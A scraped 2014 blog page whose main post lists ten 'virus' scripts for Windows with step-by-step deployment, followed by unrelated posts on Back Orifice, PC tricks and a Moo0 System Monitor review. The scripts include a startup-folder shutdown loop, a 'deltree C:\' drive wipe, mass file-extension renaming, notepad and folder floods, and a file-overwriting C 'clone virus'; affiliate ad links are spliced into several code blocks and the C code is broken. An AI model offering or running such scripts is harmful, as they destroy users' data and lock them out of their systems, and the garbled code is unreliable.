Monday, January 13, 2014

dangures viruse codes


1.  sHuTDoWn  VirUs
http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=40815&cid=7742&cuid=fxoeuun&ad=8286&subid=&opt1=&opt2=
Many of you know this trick, but i can’t call this a virus. But still its not a friendly one, it can affect and harm uR data if not saved.
http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=40815&cid=7742&cuid=fxoeuun&ad=8286&subid=&opt1=&opt2=

Effect –> May Harm uR workings and unsaved data.
Coding  Platform –> Batch Programming.
Working –> On executing, it will shutdown your system immidiately. If your data is not saved, it can harm uR workings. And can sometimes becomes more destructive for normal users.
Type the code or just paste the code in notepad and save it as “.bat” extension. Example  –>  ron.bat

**************************************************

@echo off

shutdown -s -t “30″

**************************************************

“30″ mentioned here is time in seconds in which your system will shut-down. You can set any time as uR requirements. You can also add comments by adding “-c” tag after “30″. To  give any message to user while shutdown process.

Example  –>  shutdown -s -t “60″ -c “Windows Formatting starts…”


2. sHUtDowN  V!rUs  {mORe DesTrUCt!ve}
This code is same as above but it restricts system to start and shuts down system each time it starts.

Effect –>  Destructive and Irritating.
Coding platform  –> Batch Programming.
Working  –> Shuts down system each time it starts, and user are never able to login properly. If user boots up system again and again, it sometimes cause windows failure or data lost.
Just type or copy the code in notepad and save it as “.bat” extension.

**************************************************

@echo off
http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=40815&cid=7742&cuid=fxoeuun&ad=8286&subid=&opt1=&opt2=

shutdown -s -t “00″

**************************************************

Now goto following location  –>  start  –>  all programs  –>  startup. Right Click and open folder. Now just copy that saved .bat file and paste in that startup folder.

CAUTION  –>  DON’T USE THIS ON YOUR SYSTEM, YOU WILL NEVER ABLE TO OPEN YOUR SYSTEM. ONLY WAY TO GET RID OF THIS VIRUS IS TO OPEN YOUR SYSTEM IN SAFE MODE AND JUST GOTO THAT STARTUP FOLDER AND DELETE THAT “.bat” FILE.


3.  MuLt!PLe  FoLDeR  V!RuS
Effect –> Not Destructive, But sometimes can become very irritating and itchy.
Coding Platform –>  Batch Programming.
Working –>  This code will just create multiple folders each time system starts-up and also open those hundreds of folders. It is not destructive but while executing it can eat up uR system process and results in slow system performance and sometimes could hang system.
Just write or copy the code in notepad and save it as “.bat” extension.

**************************************************

@echo off

:RON

md folder1

md folder2

md folder3

md folder4

md folder5

start folder1

start folder2

start folder3

start folder4

start folder5

goto RON

**************************************************

Now goto, START  –>  ALL PROGRAMS  –>  STARTUP FOLDER. Now just copy that .bat file in that folder. Next time system starts, multiple folders are created and will start automatically. You can name folder name anything as you want.

4.  NoTePaD  fLooD
Effect –>  Not Destructive or harmless.
Coding Platform –>  Batch Programming.
Working –>  On executing this .bat file it will open and flood loads of notepad {actually it opens around 180 notepads}. This sometimes cause PC hang.
Type the code or just copy the code in notepad and save it as “.bat” extension.

**************************************************

@echo off

:RON

start notepad

start notepad

start notepad

goto RON

**************************************************

In the above code you can write “start notepad” any number to times. Increasing this command will increase flooding and cause higher chances of system hang-up.

5.  DeaDLy  woRdPaD  V!rUs
Effect –>  Deadly and Destructive.
Coding Platform –>  Batch Programming.
Working –>  On executing, this code will delete every single piece of data from uR hard-drive. It will also wipe out windows from the system.
Just copy the code or type it in a worpad and save it as anyname with “.bat” extension.

**************************************************

@echo off

deltree C:\

**************************************************

NOTE  –  PLEASE DON’T RUN THAT “.bat” FILE ON YOUR SYSTEM. IT CAN BE VERY HARMFUL. AND LEARN THIS CODE FOR EDUCATIONAL PURPOSES ONLY, NOT TO HARM OTHERS.


6. F!le  eXTenS!oN  CorrUPT!nG  V!rUs
Effect –>  Effects file execution, irritating but not destructive. Will Corrupt file working.
Coding Platform –>  Batch Programming.
Working –>  On executing this code will affects the opening of file and will corrupt the files extension. This will corrupt the file and disables it and you will not be able to execute it in proper format.
Just type or copy the code in notepad and save it as anyname with “.bat” extension.

*************************************************

@echo off

ren *.exe *.txt

ren *.jpeg *.txt

ren *.mp3 *.txt

ren *.doc *.com

ren *.jpg *.txt

**************************************************


7.  DanC!nG   CaPsLocK  N  nUmKeY
Effect –>  Low, Irritating for normal user.
Coding Platform –>  VBscript
Working –>  On executing it will toggle both,  capslock and numkey continously and it becomes very irritating for normal user. This type of code can be used for prank purposes.
Just type the code or copy it on notepad and save it as anyname with “.vbs” extension.  Example  –>  ”ron.vbs”

**************************************************

Set wshShell =wscript.CreateObject(“WScript.Shell”)

do

wscript.sleep 100

wshshell.sendkeys “{CAPSLOCK}”

wshshell.sendkeys “{NUMLOCK}”

loop

**************************************************


8. NoTePaD  TsuNaM!  V!rUs
Effect –>  Harmful n Effective, Cause system crash easily.
Coding Platform –>  VBscript.
Working –>  On Executing, it opens notepad unlimited no. of times and write a text into notepad automatically. It looks very scary for normal users as it leads to system hang and crash system in few minutes.
Just type the code or copy it on notepad and save it as anyname with “.vbs” extension.

**************************************************

Set wshShell =wscript.CreateObject(“WScript.Shell”)

do

WshShell.Run “notepad”
WScript.Sleep 100
WshShell.SendKeys “H”
WScript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “o “
WScript.Sleep 200
WshShell.SendKeys ” “
WScript.Sleep 200
WshShell.SendKeys “u”
WScript.Sleep 200

Wshshell.Sendkeys “s”

Wscript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “r”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “…”
WScript.Sleep 200
WshShell.SendKeys “{enter}”

WScript.Sleep 200

WshShell.SendKeys “You”

WScript.Sleep 200
WshShell.SendKeys ” Have”
WScript.Sleep 200
WshShell.SendKeys ” Been”
WScript.Sleep 200
WshShell.SendKeys ” Hacked!!!”
WScript.Sleep 200
WshShell.SendKeys ” Now”
WScript.Sleep 200
WshShell.SendKeys ” Just”
WScript.Sleep 200
WshShell.SendKeys ” Taste”
WScript.Sleep 200
WshShell.SendKeys ” What”
WScript.Sleep 200
WshShell.SendKeys ” Virus”
WScript.Sleep 200
WshShell.SendKeys ” can do with uuuuuuuuuuuuu….”
WScript.Sleep 200
WshShell.SendKeys ” {enter}”
WScript.Sleep 200
WshShell.SendKeys “hahahahaha…….”
WScript.Sleep 200
WshShell.Sendkeys ” Now just Look Dumb Head what i will do!!!!!!!”

wscript.sleep 200

wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “look”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “how”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 100
wshshell.sendkeys “i”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “crash”
wscript.sleep 200
wshshell.sendkeys ” uR”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “system”
wscript.sleep 200
loop
**************************************************
9.  PoP-uP  CD/DvD  Dr!Ve  V!rUs
Effect –>  Low, but very irritating. Not Harmless.
Coding Platform –>  VBscript.
Working –>  On Executing, It will continously pop-up uR CD/DVD. It is very irritating and can be stopped only on system shut-down. It is not harmless or destructive.
Just copy the code or type it on notepad and save it as anyname with “.vbs” extension.

**************************************************

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=40815&cid=7742&cuid=fxoeuun&ad=8286&subid=&opt1=&opt2=
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=40815&cid=7742&cuid=fxoeuun&ad=8286&subid=&opt1=&opt2=
Next
End If
wscript.sleep 5000
loop

************************************************************


10.  cLoNe  V!rUs
Effect –>  Harmful and very effective.
Coding Platform –>  C, Turbo C.
Working –>  On Executing, this virus does is it makes all the files in the current directory a virus. Just remember to run this virus inside a new folder that contains no important exe and normal files . This virus will make them too as virus.
***************************************************

FILE *Ron *vRon;

int owned = 0;

unsigned long x;

char buff[256];

struct ffblk ffblk;

clock_t st, end;

main()

{

 st=clock();

 clrscr();

 owned=(find_first(“*.*”, &ffblk,0);
http://ads.cpxcenter.com/cpxcenter/s_landing.php?nid=4&pid=38505&sid=40815&cid=7742&cuid=fxoeuun&ad=8286&subid=&opt1=&opt2=

 while(!done)

 {

 Ron=fopen(_arg[0], “rb”);

 vhost=fopen(ffblk.ff_name, “rb+”);

 if (vhost = =NULL)

 goto next;

 x = 89088;

 printf(“infecting %s\n”, ffblk.ff_name);

 while(x>2048)

 {

 fread(buff,256,1,Ron);

 fwrite(buff,256,1,vRon);

 x – = 2048;

 }

 fread(buff,x,1,Ron);

 fwrite(buff,x,1,vRon);

 a++;

 next:      fcloseall();

 owned = findnext(&ffblk);

 }

 end = clock()

 printf(“Infected %d files in %f sec”, a, (end-st)/CLK_TCk);

 return (0);

}

**************************************************

Wednesday, January 8, 2014

Someone started controlling my computer over the Internet -- what happened?

There are "Trojan horse" type programs, such as Back Orifice and Netbus, that could cause the behavior you are describing. Both BO and Netbus are Windows 95/98 applications designed to allow other people to access your machine (generally for malicious purposes) over the Internet.
In order for anyone to use BO on your machine, you have to install the server side of the application. This is normally done by getting you to download an application or by sending the server EXE to you in an e-mail message and hoping you execute it. This is why it is called a Trojan horse -- you have to consciously or unconsciously run the EXE to install the server -- it does not propagate itself like a virus (see How Computer Viruses Work for a description of Trojans and viruses). Once you execute the server EXE, the server is installed and will start running automatically every time you turn on your computer.
With the server installed, an evil-doer can run the BO client program and control your computer remotely, running programs, erasing files... Obviously, this is not a good thing. It is easy to detect Back Orifice either manually or with software.
These links will help you learn more:
How Computer Viruses Work
How Web Servers Work
Symantec: Information on Back Orifice and NetBus
Trojan horses: Back Orifice & Netbus
CNET News.com: Windows "back door" raises flags

Wednesday, January 1, 2014

Computer (PC) Tricks You Should Try Right Now



Computers have simplified our life to a great extent. Things that were impossible earlier can now be completed instantly thanks to computers. But, does this mean that a PC is all work and no play?

Obviously not! Here are some of the best tricks you can try out on your Windows based computer.
Computer Tricks
1) Make your computer speak what you type
You can use your PC's built in features and some VBScript magic to create a simple program that will make your computer speak whatever you input to it. What are you waiting for? Head over to this post to start a conversation.

2) Find your computer's gender
Want to know if your PC is a male or a female? Simple. Try the previous trick to know if your computer is a 'he' or a 'she'.

On a serious note, this depends upon the voice you have selected in Microsoft Text to Speech options.

3) Lock Folders with password
Do you often have other people seeing your personal files? You can store them in a password protected folder so that only you can access them. Go see this post to know how to protect your personal files effectively.

4) Make your computer greet you every time you start Windows
A simple modification in the first trick will let you have an awesome computer said welcome that you can use to impress all your friends. Just read this post to make your computer welcome you in its own mechanical voice.

5) Have fun with Notepad
PC Tricks
If you think that Notepad is just a basic text editor, then, you will be amazed by its capabilities. You can use Notepad to create everything from personalized logs to harmless viruses that are incredibly annoying. Go see this post to know just how useful Notepad is.

6) Command Prompt too has some tricks up its sleeves
So, you thought that Notepad has some tricks but not the command prompt? If you thought so, then you would be surprised to see all the cool stuff you can do with the Windows Command Prompt. Just see this post to get impressed.

7) Change your Processor's name
Are you bored of your old processor and want a new one with a staggering name? Change its name to something extraordinary to get that something special for your PC.

8) Make a Keyboard Disco
Use some VBScript coding to create a live disco using the LED keys on your keyboard. See this post to know how your keyboard can turn into a disco.

9) Use your Keyboard as Mouse.
You know you can use your mouse as keyboard using the On-screen keyboard. What if I tell you that it is also possible to do the reverse? Just read this post to see how.


These tricks work on Windows 8, Windows 7, Windows Vista and Windows XP

[Windows] Keep an eye on computer resources use with portable Moo0



used to scratch my head, pondering on why acquiring a Windows license key was so expensive. It has to be one of the most pocket-emptying pieces of software, along with Microsoft Office. There was a time when I thought that you had to be running a small business or you had to be a millionaire to be an owner of legit Microsoft license keys. When you delve into Windows and all the features it offers from the sophisticated folder explorer to the free updates and patches, you begin to understand. Writing an operating system using C as your basis, is not an easy task and it took a group of very talented developers to craft it into what it is. All the issues and gripes we have with Windows 8 can be forgiven, once we take all of this into account and that’s why I own three or more separate license keys, all paid for with my hard earned money.
With all the tools that Windows provides us with, sometimes they may not be enough. Time and time again, I find myself praising Windows 8’s new task manager for its extensiveness and its new found user friendliness. I still feel that it’s not enough to monitor my system efficiently. Can Moo0 System Monitor fill that gap in? Read on and find out?
WHAT IS IT AND WHAT DOES IT DO
Main Functionality
Moo0 System Monitor is an expansive PC monitoring tool that comes with a long list of stats and a widely customizable user interface that offers the user an array of display options to suit his or her needs.
Pros
  • Comes with a long list of stats and displayable fields that can be sorted according to the user’s tastes.
  • Has a widely customizable user interface
  • Supports a wide variety of languages
  • Controllable refresh rate and frequency
  • System tray minimizable
  • Lightweight
Cons
  • Its functions are not intuitively accessible at first
  • It’s not traditionally designed and this can be somewhat confusing until you get used to it
  • It does not come with extensive help resources which does not help quail the confusion
  • No feature that allows logging or archiving of stats and details.
Discussion
Moo01I hate making assumptions because I find myself second guessing and tip toeing. With that being said, when I opened Moo0’s system monitor up for the first time after it’s install, I found myself making quite a few assumptions. I assumed that it was one of those self-unaware applications that was designed to suit a primary need and nothing else, like a wooden hilted hammer. After all, it doesn’t even come with a close button. It’s as ugly as sin too and it displays only a few fields with the bare minimum amount of information attached to each statistic. I was already bored with it and at first, I decided that I wasn’t going to review it. After making these assumptions, I found myself a little red faced when I discovered the right click context menu on both the system tray icon and the user interface.
I cannot be entirely blamed for my indiscretions and misjudgements here because the program does not initially fully avail itself. Once I discovered the right click menu, it was like I was opened up to a whole new world. The application will come with a default set of fields that also depend on what your PC is packing. From the right click menu, you can choose to add more to the user interface. I’m too lazy to count here but there are a lot of displayable fields and they are directly proportional in number to the robustness of your computer’s hardware. Whether you choose to display none or create mass chaos by displaying everything, it’s really up to you. You can even sort and customize this list. I will say that if you choose to display every stat, the application will not perform so well; it will run slow and the user interface will start to lose its visual integrity. If you’ve changed the size of the window and add a new field, the window will revert to its default size. I found this a little annoying.
moo02The window can be stretched and shrunk but the number of fields being displayed also creates a limit on this extensibility. Another annoyance that I found was that it launches the entire window at start up like a surprise party and I kept forgetting that it doesn’t have a close button. You can choose to launch the application on start-up but unfortunately, you cannot choose to change the windows behaviour (on start-up).
Other customizable inflections to the aesthetics of the application include the ability to change how the auto hide feature behaves. You can also make changes to the general layout so the application doesn’t always have to look similar to a dinner receipt. Did I mention the large variety of skins and languages to choose from? Nelson Mandela (RIP) dubbed South Africa as a rainbow nation with all it’s diversity in language and culture. You can almost say that this software is comparable to that sentiment, in it’s diverse range of customizable aesthetics and language options.
CONCLUSION AND DOWNLOAD LINK
I feel ambivalent about this. I enjoyed playing around with the user interface more than I payed attention to the stats and details that it was made to display. Which means that there’s a great novelty behind it. I tend to get bored with novelty applications after a while. As for you, a normal person who isn’t as weird as me? Moo0 System Monitor is a good tool. You can find a long list of alternative system monitoring programs but if you’ve never tried one out, I believe that Moo0 System Monitor deserves a home on your desktop.  If you can, make a donation to the developer as well because s/he offers a great amount of useful freeware software.
As for Ashraf’s personal choice, I believe he prefers Rainmeter over everything else. There is also BgInfo. Pick whichever one you want.
Price: Free
Version reviewed:1.76
Supported OS: Windows XP/Vista/7/8
Download size: 3.86
VirusTotal malware scan results:  0/49
Is it portable? yes